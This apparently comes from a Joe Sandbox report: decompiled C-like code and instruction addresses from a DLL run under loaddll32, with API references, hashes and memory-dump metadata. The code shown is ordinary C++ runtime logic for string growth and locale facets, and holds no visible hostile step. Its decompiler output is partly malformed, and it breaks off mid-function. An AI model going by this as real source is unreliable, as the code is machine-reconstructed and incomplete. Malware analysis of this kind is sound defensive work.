																						_t509 = _t508 - 8;
																						_push(_t369);
																						_t371 = _t394;
																						_t397 = 0x7fffffff;
																						_push(_t453);
																						_t455 = _v244;
																						_t424 = _t371[4];
																						_v256 = _t424;
																						_push(_t435);
																						__eflags = 0x7fffffff - _t424 - _t455;
																						if(__eflags < 0) {
																							E6DA814C0(_t371, 0x7fffffff, _t424, __eflags);
																							goto L81;
																						} else {
																							_t435 = _t371[5];
																							_t307 = _t424 + _t455;
																							_v32 = _t307;
																							_t473 = _t307 | 0x0000000f;
																							_v16 = _t435;
																							__eflags = _t473 - 0x7fffffff;
																							if(__eflags <= 0) {
																								_t309 = _t435 >> 1;
																								_t397 = 0x7fffffff - _t309;
																								__eflags = _t435 - _t397;
																								if(__eflags <= 0) {
																									_t310 = _t309 + _t435;
																									__eflags = _t473 - _t310;
																									_t455 =  <  ? _t310 : _t473;
																									_t124 = _t455 + 1; // 0x80000000
																									_t397 = _t124;
																									__eflags = _t397 - 0x1000;
																									if(_t397 < 0x1000) {
																										__eflags = _t397;
																										if(__eflags == 0) {
																											_t435 = 0;
																											__eflags = 0;
																										} else {
																											_t324 = E6DA89399(_t435, _t455, __eflags, _t397);
																											_t424 = _v28;
																											_t509 = _t509 + 4;
																											_t435 = _t324;
																										}
																										goto L74;
																									} else {
																										_t125 =  &(_t397[8]); // 0x80000023
																										_t325 = _t125;
																										__eflags = _t125 - _t397;
																										if(__eflags <= 0) {
																											L81:
																											E6DA81420();
																											goto L82;
																										} else {
																											goto L64;
																										}
																									}
																								} else {
																									_t455 = 0x7fffffff;
																									goto L63;
																								}
																							} else {
																								_t455 = 0x7fffffff;
																								L63:
																								_t325 = 0x80000023;
																								L64:
																								_t326 = E6DA89399(_t435, _t455, __eflags, _t325);
																								_t509 = _t509 + 4;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									L82:
																									E6DA8DACF(_t371, _t397, _t424);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t486);
																									_t487 = _t509;
																									_t510 = _t509 - 0xc;
																									_t425 = _v260;
																									_push(_t371);
																									_t372 = _t397;
																									_t398 = 0x7fffffff;
																									_push(_t455);
																									_push(_t435);
																									_t456 = _t372[4];
																									_v272 = _t456;
																									__eflags = 0x7fffffff - _t456 - _t425;
																									if(__eflags < 0) {
																										E6DA814C0(_t372, 0x7fffffff, _t425, __eflags);
																										goto L104;
																									} else {
																										_t435 = _t372[5];
																										_t283 = _t456 + _t425;
																										_v36 = _t283;
																										_t467 = _t283 | 0x0000000f;
																										_v20 = _t435;
																										__eflags = _t467 - 0x7fffffff;
																										if(__eflags <= 0) {
																											_t285 = _t435 >> 1;
																											_t398 = 0x7fffffff - _t285;
																											__eflags = _t435 - _t398;
																											if(__eflags <= 0) {
																												_t286 = _t285 + _t435;
																												__eflags = _t467 - _t286;
																												_t456 =  <  ? _t286 : _t467;
																												_t154 = _t456 + 1; // 0x80000000
																												_t398 = _t154;
																												__eflags = _t398 - 0x1000;
																												if(_t398 < 0x1000) {
																													__eflags = _t398;
																													if(__eflags == 0) {
																														_t435 = 0;
																														__eflags = 0;
																													} else {
																														_t304 = E6DA89399(_t435, _t456, __eflags, _t398);
																														_t510 = _t510 + 4;
																														_t435 = _t304;
																													}
																													goto L97;
																												} else {
																													_t155 = _t398 + 0x23; // 0x80000023
																													_t305 = _t155;
																													__eflags = _t155 - _t398;
																													if(__eflags <= 0) {
																														L104:
																														E6DA81420();
																														goto L105;
																													} else {
																														goto L87;
																													}
																												}
																											} else {
																												_t456 = 0x7fffffff;
																												goto L86;
																											}
																										} else {
																											_t456 = 0x7fffffff;
																											L86:
																											_t305 = 0x80000023;
																											L87:
																											_t306 = E6DA89399(_t435, _t456, __eflags, _t305);
																											_t510 = _t510 + 4;
																											__eflags = _t306;
																											if(_t306 == 0) {
																												L105:
																												E6DA8DACF(_t372, _t398, _t425);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t487);
																												_t511 = _t510 - 8;
																												_push(_t372);
																												_t373 = _t398;
																												_t399 = 0x7fffffff;
																												_push(_t456);
																												_t457 = _v280;
																												_t426 = _t373[4];
																												_v292 = _t426;
																												_push(_t435);
																												__eflags = 0x7fffffff - _t426 - _t457;
																												if(__eflags < 0) {
																													E6DA814C0(_t373, 0x7fffffff, _t426, __eflags);
																													goto L127;
																												} else {
																													_t437 = _t373[5];
																													_t262 = _t426 + _t457;
																													_v40 = _t262;
																													_t459 = _t262 | 0x0000000f;
																													_v24 = _t437;
																													__eflags = _t459 - 0x7fffffff;
																													if(__eflags <= 0) {
																														_t264 = _t437 >> 1;
																														_t399 = 0x7fffffff - _t264;
																														__eflags = _t437 - _t399;
																														if(__eflags <= 0) {
																															_t265 = _t264 + _t437;
																															__eflags = _t459 - _t265;
																															_t460 =  <  ? _t265 : _t459;
																															_t193 = _t460 + 1; // 0x80000000
																															_t399 = _t193;
																															__eflags = _t399 - 0x1000;
																															if(_t399 < 0x1000) {
																																__eflags = _t399;
																																if(__eflags == 0) {
																																	_t438 = 0;
																																	__eflags = 0;
																																} else {
																																	_t280 = E6DA89399(_t437, _t460, __eflags, _t399);
																																	_t426 = _v36;
																																	_t511 = _t511 + 4;
																																	_t438 = _t280;
																																}
																																goto L120;
																															} else {
																																_t194 = _t399 + 0x23; // 0x80000023
																																_t281 = _t194;
																																__eflags = _t194 - _t399;
																																if(__eflags <= 0) {
																																	L127:
																																	E6DA81420();
																																	goto L128;
																																} else {
																																	goto L110;
																																}
																															}
																														} else {
																															_t460 = 0x7fffffff;
																															goto L109;
																														}
																													} else {
																														_t460 = 0x7fffffff;
																														L109:
																														_t281 = 0x80000023;
																														L110:
																														_t282 = E6DA89399(_t437, _t460, __eflags, _t281);
																														_t511 = _t511 + 4;
																														__eflags = _t282;
																														if(_t282 == 0) {
																															L128:
																															_t259 = E6DA8DACF(_t373, _t399, _t426);
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															_t400 =  *_t399;
																															__eflags = _t400;
																															if(_t400 != 0) {
																																return  *((intOrPtr*)( *_t400))(1);
																															}
																															return _t259;
																														} else {
																															_t426 = _v36;
																															_t191 = _t282 + 0x23; // 0x23
																															_t438 = _t191 & 0xffffffe0;
																															 *(_t438 - 4) = _t282;
																															L120:
																															_t373[4] = _v40;
																															_t373[5] = _t460;
																															_t461 = _t438 + _t426;
																															_v40 = _t461;
																															__eflags = _v24 - 0x10;
																															_v36 = _v16 + _t461;
																															_push(_t426);
																															if(_v24 < 0x10) {
																																_push(_t373);
																																_push(_t438);
																																E6DA8AB10();
																																E6DA8B0A0(_t438, _t461, _v12, _v16);
																																 *_v36 = 0;
																																 *_t373 = _t438;
																																return _t373;
																															} else {
																																_t463 =  *_t373;
																																_push(_t463);
																																_push(_t438);
																																E6DA8AB10();
																																E6DA8B0A0(_t438, _v40, _v12, _v16);
																																_t402 = _v24 + 1;
																																 *_v36 = 0;
																																__eflags = _t402 - 0x1000;
																																if(_t402 < 0x1000) {
																																	L124:
																																	_push(_t402);
																																	E6DA893C9(_t463);
																																	 *_t373 = _t438;
																																	return _t373;
																																} else {
																																	_t426 =  *(_t463 - 4);
																																	_t399 = _t402 + 0x23;
																																	_t212 = _t463 - _t426 - 4; // 0x7ffffffb
																																	__eflags = _t212 - 0x1f;
																																	if(_t212 > 0x1f) {
																																		goto L128;
																																	} else {
																																		_t463 = _t426;
																																		goto L124;
																																	}
																																}
																															}
																														}
																													}
																												}
																											} else {
																												_t152 = _t306 + 0x23; // 0x23
																												_t435 = _t152 & 0xffffffe0;
																												 *(_t435 - 4) = _t306;
																												L97:
																												_t372[4] = _v36;
																												_t289 = _v12;
																												_t372[5] = _t456;
																												_v32 = _v32 - _t289 + 1;
																												_t468 = _t435 + _t289;
																												_v40 = _t468;
																												__eflags = _v20 - 0x10;
																												_v36 = _v8 + _t468;
																												_push(_t289);
																												if(_v20 < 0x10) {
																													_push(_t372);
																													_push(_t435);
																													E6DA8AB10();
																													E6DA8B0A0(_t435, _t468, _v4, _v8);
																													__eflags = _t372 + _v12;
																													E6DA8AB10(_v36, _t372 + _v12, _v32);
																													 *_t372 = _t435;
																													return _t372;
																												} else {
																													_t470 =  *_t372;
																													_push(_t470);
																													_push(_t435);
																													E6DA8AB10();
																													E6DA8B0A0(_t435, _v40, _v4, _v8);
																													E6DA8AB10(_v36, _v12 + _t470, _v32);
																													_t510 = _t510 + 0x24;
																													_t409 = _v20 + 1;
																													__eflags = _t409 - 0x1000;
																													if(_t409 < 0x1000) {
																														L101:
																														_push(_t409);
																														E6DA893C9(_t470);
																														 *_t372 = _t435;
																														return _t372;
																													} else {
																														_t425 =  *(_t470 - 4);
																														_t398 = _t409 + 0x23;
																														_t456 = _t470 - _t425;
																														_t177 = _t456 - 4; // 0x7ffffffb
																														__eflags = _t177 - 0x1f;
																														if(_t177 > 0x1f) {
																															goto L105;
																														} else {
																															_t470 = _t425;
																															goto L101;
																														}
																													}
																												}
																											}
																										}
																									}
																								} else {
																									_t424 = _v28;
																									_t122 = _t326 + 0x23; // 0x23
																									_t435 = _t122 & 0xffffffe0;
																									 *(_t435 - 4) = _t326;
																									L74:
																									_t371[4] = _v32;
																									_t371[5] = _t455;
																									_t474 = _t435 + _t424;
																									_v32 = _t474;
																									__eflags = _v16 - 0x10;
																									_v28 = _v4 + _t474;
																									_push(_t424);
																									if(_v16 < 0x10) {
																										_push(_t371);
																										_push(_t435);
																										E6DA8AB10();
																										E6DA8AB10(_t474, _v8, _v4);
																										 *_v28 = 0;
																										 *_t371 = _t435;
																										return _t371;
																									} else {
																										_t476 =  *_t371;
																										_push(_t476);
																										_push(_t435);
																										E6DA8AB10();
																										E6DA8AB10(_v32, _v8, _v4);
																										_t509 = _t509 + 0x18;
																										_t411 = _v16 + 1;
																										 *_v28 = 0;
																										__eflags = _t411 - 0x1000;
																										if(_t411 < 0x1000) {
																											L78:
																											_push(_t411);
																											E6DA893C9(_t476);
																											 *_t371 = _t435;
																											return _t371;
																										} else {
																											_t424 =  *(_t476 - 4);
																											_t397 = _t411 + 0x23;
																											_t455 = _t476 - _t424;
																											_t141 = _t455 - 4; // 0x7ffffffb
																											__eflags = _t141 - 0x1f;
																											if(_t141 > 0x1f) {
																												goto L82;
																											} else {
																												_t476 = _t424;
																												goto L78;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t453 = _v36;
																						_v12 = _t453;
																						_v24 = 1;
																						E6DA88A87(__eflags, _t453);
																						 *((intOrPtr*)( *_t453 + 4))();
																						 *0x6dad5c78 = _t453;
																						goto L58;
																					}
																				} else {
																					_t453 = _t369;
																					goto L58;
																				}
																			} else {
																				_t453 =  *( *((intOrPtr*)(_t329 + 8)) + _t435 * 4);
																				goto L53;
																			}
																		}
																	}
																}
															} else {
																E6DA88BB9( &_v88,  &_v88, _t434);
																 *((intOrPtr*)(_t451 + 4)) = 0;
																 *_t451 = 0x6daa4e00;
																E6DA829E0( &_v88);
																_v8 = _t451;
																_v20 = 9;
																E6DA88A87(__eflags, _t451);
																 *((intOrPtr*)( *_t451 + 4))();
																 *0x6dad5c7c = _t451;
																goto L27;
															}
														} else {
															_t451 = _t367;
															goto L27;
														}
													} else {
														_t451 =  *( *((intOrPtr*)(_t342 + 8)) + _t432 * 4);
														goto L32;
													}
												}
											} else {
												L27:
												E6DA8892E( &_v36);
												 *[fs:0x0] = _v28;
												return _t451;
											}
										}
									} else {
										E6DA88BB9( &_v112,  &_v112, _t431);
										 *((intOrPtr*)(_t449 + 4)) = 0;
										 *_t449 = 0x6daa4dd0;
										E6DA88DE6(_t431, _t449, __eflags,  &_v60);
										asm("movups xmm0, [eax]");
										asm("movups [esi+0x8], xmm0");
										E6DA829E0( &_v112);
										_v36 = _t449;
										_v16 = 9;
										E6DA88A87(__eflags, _t449);
										 *((intOrPtr*)( *_t449 + 4))();
										 *0x6dad5c80 = _t449;
										goto L6;
									}
								} else {
									_t449 = _t221;
									goto L6;
								}
							} else {
								_t449 =  *( *((intOrPtr*)(_t357 + 8)) + _t429 * 4);
								goto L11;
							}
						}
					} else {
						L6:
						E6DA8892E( &_v40);
						 *[fs:0x0] = _v24;
						return _t449;
					}
				}
			}

































































































































              0x6da85a50
              0x6da85a51
              0x6da85a59
              0x6da85a60
              0x6da85a64
              0x6da85a66
              0x6da85a68
              0x6da85a73
              0x6da85a74
              0x6da85a7b
              0x6da85a7c
              0x6da85a7f
              0x6da85a80
              0x6da85a86
              0x6da85a8b
              0x6da85a92
              0x6da85a98
              0x6da85a9d
              0x6da85aa2
              0x6da85aa8
              0x6da85aad
              0x6da85ab3
              0x6da85ab5
              0x6da85aba
              0x6da85abb
              0x6da85ac0
              0x6da85ac0
              0x6da85ac8
              0x6da85acd
              0x6da85acd
              0x6da85ad6
              0x6da85ad6
              0x6da85adc
              0x6da85b05
              0x6da85b05
              0x00000000
              0x6da85ade
              0x6da85ae1
              0x6da85ae6
              0x6da85b07
              0x6da85b07
              0x6da85b0b
              0x6da85b1d
              0x6da85b1d
              0x6da85b1f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85b0d
              0x6da85b0d
              0x6da85b12
              0x6da85b15
              0x6da85b21
              0x6da85b21
              0x6da85b24
              0x6da85b26
              0x6da85b33
              0x6da85b35
              0x6da85b38
              0x6da85b3e
              0x6da85b3e
              0x6da85b41
              0x6da85b43
              0x6da85b51
              0x6da85b45
              0x6da85b45
              0x6da85b48
              0x6da85b4a
              0x6da85b4c
              0x6da85b4c
              0x6da85b4c
              0x6da85b4a
              0x6da85b5b
              0x6da85b60
              0x6da85b67
              0x6da85b6b
              0x6da85b72
              0x6da85b78
              0x6da85b7f
              0x6da85b83
              0x6da85b86
              0x6da85b8a
              0x6da85b8d
              0x6da85b90
              0x6da85b93
              0x6da85b96
              0x6da85b9a
              0x6da85b9c
              0x6da85bf7
              0x6da85bfc
              0x6da85bfd
              0x6da85bfe
              0x6da85bff
              0x6da85c00
              0x6da85c01
              0x6da85c03
              0x6da85c05
              0x6da85c10
              0x6da85c11
              0x6da85c18
              0x6da85c1b
              0x6da85c1c
              0x6da85c1d
              0x6da85c23
              0x6da85c28
              0x6da85c2f
              0x6da85c35
              0x6da85c3b
              0x6da85c3d
              0x6da85c43
              0x6da85c48
              0x6da85c4e
              0x6da85c50
              0x6da85c55
              0x6da85c55
              0x6da85c56
              0x6da85c5b
              0x6da85c5b
              0x6da85c63
              0x6da85c68
              0x6da85c68
              0x6da85c71
              0x6da85c74
              0x6da85c77
              0x6da85c9e
              0x6da85c9e
              0x00000000
              0x6da85c79
              0x6da85c7c
              0x6da85c7f
              0x6da85c81
              0x6da85ca0
              0x6da85ca0
              0x6da85ca4
              0x6da85cb6
              0x6da85cb6
              0x6da85cb8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85ca6
              0x6da85ca6
              0x6da85cab
              0x6da85cae
              0x6da85cba
              0x6da85cba
              0x6da85cbc
              0x6da85cc9
              0x6da85ccb
              0x6da85cce
              0x6da85cd4
              0x6da85cd7
              0x6da85cd9
              0x6da85ce7
              0x6da85cdb
              0x6da85cdb
              0x6da85cde
              0x6da85ce0
              0x6da85ce2
              0x6da85ce2
              0x6da85ce0
              0x6da85cf1
              0x6da85cf6
              0x6da85cfd
              0x6da85d01
              0x6da85d08
              0x6da85d0e
              0x6da85d15
              0x6da85d19
              0x6da85d1c
              0x6da85d20
              0x6da85d23
              0x6da85d26
              0x6da85d29
              0x6da85d2c
              0x6da85d30
              0x6da85d32
              0x6da85d7d
              0x6da85d82
              0x6da85d83
              0x6da85d84
              0x6da85d85
              0x6da85d86
              0x6da85d87
              0x6da85d88
              0x6da85d89
              0x6da85d8a
              0x6da85d8b
              0x6da85d8c
              0x6da85d8d
              0x6da85d8e
              0x6da85d8f
              0x6da85d90
              0x6da85d91
              0x6da85d93
              0x6da85d95
              0x6da85da0
              0x6da85da1
              0x6da85da8
              0x6da85dab
              0x6da85dac
              0x6da85dad
              0x6da85db3
              0x6da85db8
              0x6da85dbf
              0x6da85dc5
              0x6da85dcb
              0x6da85dce
              0x6da85dd0
              0x6da85dd6
              0x6da85ddb
              0x6da85de1
              0x6da85de3
              0x6da85de8
              0x6da85de8
              0x6da85de9
              0x6da85dee
              0x6da85dee
              0x6da85df6
              0x6da85dfb
              0x6da85dfb
              0x6da85e04
              0x6da85e07
              0x6da85e0a
              0x6da85e18
              0x6da85e18
              0x00000000
              0x6da85e0c
              0x6da85e0f
              0x6da85e12
              0x6da85e14
              0x6da85e70
              0x6da85e73
              0x6da85e80
              0x6da85e8a
              0x6da85e16
              0x6da85e1a
              0x6da85e1a
              0x6da85e1e
              0x6da85e30
              0x6da85e30
              0x6da85e32
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85e20
              0x6da85e20
              0x6da85e25
              0x6da85e28
              0x6da85e34
              0x6da85e34
              0x6da85e36
              0x6da85e43
              0x6da85e48
              0x6da85e4b
              0x6da85e4e
              0x6da85e8b
              0x6da85e90
              0x6da85e91
              0x6da85e92
              0x6da85e93
              0x6da85e94
              0x6da85e95
              0x6da85e96
              0x6da85e97
              0x6da85e98
              0x6da85e99
              0x6da85e9a
              0x6da85e9b
              0x6da85e9c
              0x6da85e9d
              0x6da85e9e
              0x6da85e9f
              0x6da85ea0
              0x6da85ea1
              0x6da85ea3
              0x6da85ea6
              0x6da85ea7
              0x6da85ea9
              0x6da85eb0
              0x6da85eb1
              0x6da85eb4
              0x6da85eb9
              0x6da85ebc
              0x6da85ebd
              0x6da85ebf
              0x6da85fe2
              0x00000000
              0x6da85ec5
              0x6da85ec5
              0x6da85ec8
              0x6da85ecd
              0x6da85ed0
              0x6da85ed3
              0x6da85ed6
              0x6da85ed8
              0x6da85f02
              0x6da85f04
              0x6da85f06
              0x6da85f08
              0x6da85f11
              0x6da85f13
              0x6da85f15
              0x6da85f18
              0x6da85f18
              0x6da85f1b
              0x6da85f21
              0x6da85f30
              0x6da85f32
              0x6da85f44
              0x6da85f44
              0x6da85f34
              0x6da85f35
              0x6da85f3a
              0x6da85f3d
              0x6da85f40
              0x6da85f40
              0x00000000
              0x6da85f23
              0x6da85f23
              0x6da85f23
              0x6da85f26
              0x6da85f28
              0x6da85fe7
              0x6da85fe7
              0x00000000
              0x6da85f2e
              0x00000000
              0x6da85f2e
              0x6da85f28
              0x6da85f0a
              0x6da85f0a
              0x00000000
              0x6da85f0a
              0x6da85eda
              0x6da85eda
              0x6da85edc
              0x6da85edc
              0x6da85ee1
              0x6da85ee2
              0x6da85ee7
              0x6da85eea
              0x6da85eec
              0x6da85fec
              0x6da85fec
              0x6da85ff1
              0x6da85ff2
              0x6da85ff3
              0x6da85ff4
              0x6da85ff5
              0x6da85ff6
              0x6da85ff7
              0x6da85ff8
              0x6da85ff9
              0x6da85ffa
              0x6da85ffb
              0x6da85ffc
              0x6da85ffd
              0x6da85ffe
              0x6da85fff
              0x6da86000
              0x6da86001
              0x6da86003
              0x6da86006
              0x6da86009
              0x6da8600a
              0x6da8600c
              0x6da86011
              0x6da86014
              0x6da86015
              0x6da8601a
              0x6da8601d
              0x6da8601f
              0x6da86165
              0x00000000
              0x6da86025
              0x6da86025
              0x6da86028
              0x6da8602d
              0x6da86030
              0x6da86033
              0x6da86036
              0x6da86038
              0x6da8605f
              0x6da86061
              0x6da86063
              0x6da86065
              0x6da8606e
              0x6da86070
              0x6da86072
              0x6da86075
              0x6da86075
              0x6da86078
              0x6da8607e
              0x6da8608d
              0x6da8608f
              0x6da8609e
              0x6da8609e
              0x6da86091
              0x6da86092
              0x6da86097
              0x6da8609a
              0x6da8609a
              0x00000000
              0x6da86080
              0x6da86080
              0x6da86080
              0x6da86083
              0x6da86085
              0x6da8616a
              0x6da8616a
              0x00000000
              0x6da8608b
              0x00000000
              0x6da8608b
              0x6da86085
              0x6da86067
              0x6da86067
              0x00000000
              0x6da86067
              0x6da8603a
              0x6da8603a
              0x6da8603c
              0x6da8603c
              0x6da86041
              0x6da86042
              0x6da86047
              0x6da8604a
              0x6da8604c
              0x6da8616f
              0x6da8616f
              0x6da86174
              0x6da86175
              0x6da86176
              0x6da86177
              0x6da86178
              0x6da86179
              0x6da8617a
              0x6da8617b
              0x6da8617c
              0x6da8617d
              0x6da8617e
              0x6da8617f
              0x6da86180
              0x6da86183
              0x6da86186
              0x6da86187
              0x6da86189
              0x6da86190
              0x6da86191
              0x6da86194
              0x6da86199
              0x6da8619c
              0x6da8619d
              0x6da8619f
              0x6da862c9
              0x00000000
              0x6da861a5
              0x6da861a5
              0x6da861a8
              0x6da861ad
              0x6da861b0
              0x6da861b3
              0x6da861b6
              0x6da861b8
              0x6da861e2
              0x6da861e4
              0x6da861e6
              0x6da861e8
              0x6da861f1
              0x6da861f3
              0x6da861f5
              0x6da861f8
              0x6da861f8
              0x6da861fb
              0x6da86201
              0x6da86210
              0x6da86212
              0x6da86224
              0x6da86224
              0x6da86214
              0x6da86215
              0x6da8621a
              0x6da8621d
              0x6da86220
              0x6da86220
              0x00000000
              0x6da86203
              0x6da86203
              0x6da86203
              0x6da86206
              0x6da86208
              0x6da862ce
              0x6da862ce
              0x00000000
              0x6da8620e
              0x00000000
              0x6da8620e
              0x6da86208
              0x6da861ea
              0x6da861ea
              0x00000000
              0x6da861ea
              0x6da861ba
              0x6da861ba
              0x6da861bc
              0x6da861bc
              0x6da861c1
              0x6da861c2
              0x6da861c7
              0x6da861ca
              0x6da861cc
              0x6da862d3
              0x6da862d3
              0x6da862d8
              0x6da862d9
              0x6da862da
              0x6da862db
              0x6da862dc
              0x6da862dd
              0x6da862de
              0x6da862df
              0x6da862e0
              0x6da862e2
              0x6da862e4
              0x00000000
              0x6da862ea
              0x6da862ec
              0x6da861d2
              0x6da861d2
              0x6da861d5
              0x6da861d8
              0x6da861db
              0x6da86226
              0x6da86229
              0x6da86236
              0x6da86239
              0x6da8623e
              0x6da86241
              0x6da86245
              0x6da86248
              0x6da86249
              0x6da862a0
              0x6da862a1
              0x6da862a2
              0x6da862ae
              0x6da862b9
              0x6da862be
              0x6da862c6
              0x6da8624b
              0x6da8624b
              0x6da8624d
              0x6da8624e
              0x6da8624f
              0x6da8625d
              0x6da8626b
              0x6da8626c
              0x6da8626f
              0x6da86275
              0x6da86289
              0x6da86289
              0x6da8628b
              0x6da86293
              0x6da8629d
              0x6da86277
              0x6da86277
              0x6da8627a
              0x6da8627f
              0x6da86282
              0x6da86285
              0x00000000
              0x6da86287
              0x6da86287
              0x00000000
              0x6da86287
              0x6da86285
              0x6da86275
              0x6da86249
              0x6da861cc
              0x6da861b8
              0x6da86052
              0x6da86052
              0x6da86055
              0x6da86058
              0x6da860a0
              0x6da860a6
              0x6da860b0
              0x6da860b6
              0x6da860b9
              0x6da860bf
              0x6da860c4
              0x6da860c7
              0x6da860cb
              0x6da860ce
              0x6da860cf
              0x6da86131
              0x6da86132
              0x6da86133
              0x6da8613f
              0x6da8614a
              0x6da86150
              0x6da86158
              0x6da86162
              0x6da860d1
              0x6da860d1
              0x6da860d3
              0x6da860d4
              0x6da860d5
              0x6da860e3
              0x6da860f4
              0x6da860fc
              0x6da860ff
              0x6da86100
              0x6da86106
              0x6da8611a
              0x6da8611a
              0x6da8611c
              0x6da86124
              0x6da8612e
              0x6da86108
              0x6da86108
              0x6da8610b
              0x6da8610e
              0x6da86110
              0x6da86113
              0x6da86116
              0x00000000
              0x6da86118
              0x6da86118
              0x00000000
              0x6da86118
              0x6da86116
              0x6da86106
              0x6da860cf
              0x6da8604c
              0x6da86038
              0x6da85ef2
              0x6da85ef2
              0x6da85ef5
              0x6da85ef8
              0x6da85efb
              0x6da85f46
              0x6da85f49
              0x6da85f4f
              0x6da85f52
              0x6da85f57
              0x6da85f5a
              0x6da85f5e
              0x6da85f61
              0x6da85f62
              0x6da85fb9
              0x6da85fba
              0x6da85fbb
              0x6da85fc7
              0x6da85fd2
              0x6da85fd7
              0x6da85fdf
              0x6da85f64
              0x6da85f64
              0x6da85f66
              0x6da85f67
              0x6da85f68
              0x6da85f76
              0x6da85f7e
              0x6da85f84
              0x6da85f85
              0x6da85f88
              0x6da85f8e
              0x6da85fa2
              0x6da85fa2
              0x6da85fa4
              0x6da85fac
              0x6da85fb6
              0x6da85f90
              0x6da85f90
              0x6da85f93
              0x6da85f96
              0x6da85f98
              0x6da85f9b
              0x6da85f9e
              0x00000000
              0x6da85fa0
              0x6da85fa0
              0x00000000
              0x6da85fa0
              0x6da85f9e
              0x6da85f8e
              0x6da85f62
              0x6da85eec
              0x6da85ed8
              0x6da85e50
              0x6da85e50
              0x6da85e53
              0x6da85e57
              0x6da85e5b
              0x6da85e67
              0x6da85e6a
              0x00000000
              0x6da85e6a
              0x6da85e38
              0x6da85e38
              0x00000000
              0x6da85e38
              0x6da85e2a
              0x6da85e2d
              0x00000000
              0x6da85e2d
              0x6da85e28
              0x6da85e1e
              0x6da85e14
              0x6da85d34
              0x6da85d39
              0x6da85d41
              0x6da85d4b
              0x6da85d51
              0x6da85d56
              0x6da85d5a
              0x6da85d5e
              0x6da85d6a
              0x6da85d6d
              0x00000000
              0x6da85d6d
              0x6da85cbe
              0x6da85cbe
              0x00000000
              0x6da85cbe
              0x6da85cb0
              0x6da85cb3
              0x00000000
              0x6da85cb3
              0x6da85cae
              0x6da85c83
              0x6da85c83
              0x6da85c86
              0x6da85c93
              0x6da85c9d
              0x6da85c9d
              0x6da85c81
              0x6da85b9e
              0x6da85ba3
              0x6da85bab
              0x6da85bb3
              0x6da85bb9
              0x6da85bc4
              0x6da85bc7
              0x6da85bcb
              0x6da85bd0
              0x6da85bd4
              0x6da85bd8
              0x6da85be4
              0x6da85be7
              0x00000000
              0x6da85be7
              0x6da85b28
              0x6da85b28
              0x00000000
              0x6da85b28
              0x6da85b17
              0x6da85b1a
              0x00000000
              0x6da85b1a
              0x6da85b15
              0x6da85ae8
              0x6da85ae8
              0x6da85aeb
              0x6da85af6
              0x6da85b04
              0x6da85b04
              0x6da85ae6

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85A86
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85AA8
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85AC8
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85AEB
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85B5B
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA85BA3
              • __Getctype.LIBCPMT ref: 6DA85BB9
              • std::_Facet_Register.LIBCPMT ref: 6DA85BD8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
              • String ID: bad locale name
              • API String ID: 2622896957-1405518554
              • Opcode ID: 06907635e88ba6797731b0b6aaffc7feff9fca8b6f7b0dcdab66caf9cc7e7a0c
              • Instruction ID: 955578379410fba3849690eb8fecfcbd5b05d3726e4171a344eed0a76a8dfeed
              • Opcode Fuzzy Hash: 06907635e88ba6797731b0b6aaffc7feff9fca8b6f7b0dcdab66caf9cc7e7a0c
              • Instruction Fuzzy Hash: A251A375D0C3499FCB11CFA8D9847AEBBB0FF15310F198159DC55AB282EB30A985CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA862F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 144COMMON
              Download Yara Rule
              C-Code - Quality: 63%
              			E6DA862F0(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				short _v40;
				char _v44;
				short _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v120;
				char _v164;
				void* __esi;
				intOrPtr _t48;
				void* _t54;
				char* _t64;
				intOrPtr _t66;
				short _t67;
				char _t69;
				char _t70;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr _t81;
				void* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr _t91;
				void* _t92;
				void* _t94;

				_push(0xffffffff);
				_push(E6DAA2715);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_t92 = _t91 - 0x94;
				_v20 = 0;
				_t73 = _a4;
				if(_t73 == 0) {
					L11:
